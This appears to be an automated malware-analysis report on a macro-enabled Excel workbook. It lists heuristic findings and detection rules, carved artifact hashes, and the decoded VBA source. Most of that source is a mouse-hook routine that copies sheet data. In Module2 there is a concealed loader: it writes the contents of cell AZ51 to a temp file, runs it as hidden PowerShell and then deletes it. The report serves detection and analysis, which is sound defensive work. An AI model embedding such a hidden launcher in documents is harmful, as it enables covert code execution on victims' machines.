Verdict: MALICIOUS
Risk score: 268
Heuristics: 7

1. VBA project inside OOXML (severity: medium; rule: OOXML_VBA; 6 related findings)
   Document contains a VBA project — VBA macros present.

2. Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
   Matched line in script: `Shell "powershell.exe -File """ & f & """", 0`

3. PowerShell reference in VBA (severity: critical; rule: OLE_VBA_PS)
   Matched line in script: `Shell "powershell.exe -File """ & f & """", 0`

4. CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
   Matched line in script: `With CreateObject("Scripting.FileSystemObject").CreateTextFile(f, True)`

5. VBA polls global keyboard state (keylogger) (severity: high; rule: OLE_VBA_KEYLOGGER_SPYWARE)
   The macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence.
   Matched line in script: `Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _`
   Note: the rule matched on the SetWindowsHookEx declaration itself; in the extracted source (Module1) the hook is installed with `WH_MOUSE_LL` (14), a low-level mouse hook, not a keyboard hook.

6. VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
   Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

7. Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
   Matched line in script: `f = Environ("TEMP") & "\cache.dat"`
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7548 bytes | ab975822e6538bc3199ca4dd9e522c09e9f82c8e6b4472fa1abfbf93c3da36e3 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 40960 bytes | 91dfb417eb67dace972ee859a3348621f6a0d92ad7d00187f5744b239f295460 |

Preview of macros.bas (first 1,000 lines of the extracted script; Russian comments translated, identifiers and string literals left as extracted):

```vba
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Static ХукУстановлен As Boolean
If Not ХукУстановлен Then
ХукУстановлен = True
Call УстановитьХукНаМышь
MsgBox "Трекинг мыши активирован!", vbInformation ' can be removed
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Call СнятьХук
End Sub
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Static ХукУстановлен As Boolean
If Not ХукУстановлен Then
ХукУстановлен = True
Call УстановитьХукНаМышь
MsgBox "Трекинг мыши активирован!", vbInformation ' can be removed
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Call СнятьХук
End Sub
Attribute VB_Name = "Module1"
Option Explicit
' =============================================
' API for a low-level mouse hook
' =============================================
#If VBA7 Then
Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
(ByVal idHook As Long, ByVal lpfn As LongPtr, ByVal hmod As LongPtr, ByVal dwThreadId As Long) As LongPtr
Private Declare PtrSafe Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As LongPtr) As Long
Private Declare PtrSafe Function CallNextHookEx Lib "user32" _
(ByVal hhk As LongPtr, ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Private Declare PtrSafe Function GetCurrentThreadId Lib "kernel32" () As Long
#Else
Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
(ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As Long) As Long
Private Declare Function CallNextHookEx Lib "user32" _
(ByVal hhk As Long, ByVal nCode As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentThreadId Lib "kernel32" () As Long
#End If
Private Const WH_MOUSE_LL As Long = 14
Private Const WM_MOUSEWHEEL As Long = &H20A
Private Const WM_LBUTTONDOWN As Long = &H201 ' left click
Private Const WM_MOUSEMOVE As Long = &H200 ' mouse movement
Private hHook As LongPtr
Private УжеСработало As Boolean
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type MSLLHOOKSTRUCT
pt As POINTAPI
mouseData As Long
flags As Long
time As Long
dwExtraInfo As LongPtr
End Type
' =============================================
' Hook procedure: all mouse actions are caught here
' =============================================
Public Function MouseProc(ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
If nCode = 0 Then
Select Case wParam
Case WM_MOUSEWHEEL
If Not УжеСработало Then
УжеСработало = True
Call Действие_Колесико
End If
Case WM_LBUTTONDOWN
' A separate action on click can be added
' Call Действие_Клик
Case WM_MOUSEMOVE
' Mouse movement: can be added, but it will fire frequently
' Static LastTime As Long
' If Abs(Timer - LastTime) > 1 Then
' LastTime = Timer
' Call Действие_Движение
' End If
End Select
End If
MouseProc = CallNextHookEx(hHook, nCode, wParam, lParam)
End Function
' =============================================
' Installing the hook
' =============================================
Sub УстановитьХукНаМышь()
If hHook = 0 Then
hHook = SetWindowsHookEx(WH_MOUSE_LL, AddressOf MouseProc, 0, GetCurrentThreadId())
If hHook = 0 Then
MsgBox "Не удалось установить хук мыши!", vbCritical
End If
End If
End Sub
Sub СнятьХук()
If hHook <> 0 Then
UnhookWindowsHookEx hHook
hHook = 0
End If
End Sub
' =============================================
' Your scripts (examples)
' =============================================
Sub Действие_Колесико()
Call ПеренестиДанныеСЛист1НаЛист2
End Sub
Sub ПеренестиДанныеСЛист1НаЛист2()
Dim ws1 As Worksheet, ws2 As Worksheet
On Error Resume Next
Set ws1 = ThisWorkbook.Sheets("Лист1")
Set ws2 = ThisWorkbook.Sheets("Лист2")
On Error GoTo 0
If ws2 Is Nothing Then
Set ws2 = ThisWorkbook.Sheets.Add
ws2.Name = "Лист2"
End If
ws2.Cells.Clear
ws1.UsedRange.Copy Destination:=ws2.Range("A1")
MsgBox "? Данные перенесены (по колесику мыши)!", vbInformation
End Sub
' Example of other actions (uncomment if needed)
' Sub Действие_Клик()
' MsgBox "Клик мышью!", vbInformation
' End Sub
Attribute VB_Name = "Module2"
#If VBA7 Then
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#Else
Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#End If
Sub ВыполнитьОбработкуПлатежей()
On Error Resume Next
Dim Data As String
Data = Trim(Range("AZ51").Value)
If Data = "" Then Exit Sub
Call ОбработатьФайл(Data)
End Sub
Sub ОбработатьФайл(Data As String)
On Error Resume Next
Dim f As String
f = Environ("TEMP") & "\cache.dat"
With CreateObject("Scripting.FileSystemObject").CreateTextFile(f, True)
.Write Data
.Close
End With
' The most neutral launch
Shell "powershell.exe -File """ & f & """", 0
s 1000
CreateObject("Scripting.FileSystemObject").DeleteFile f, True
End Sub
```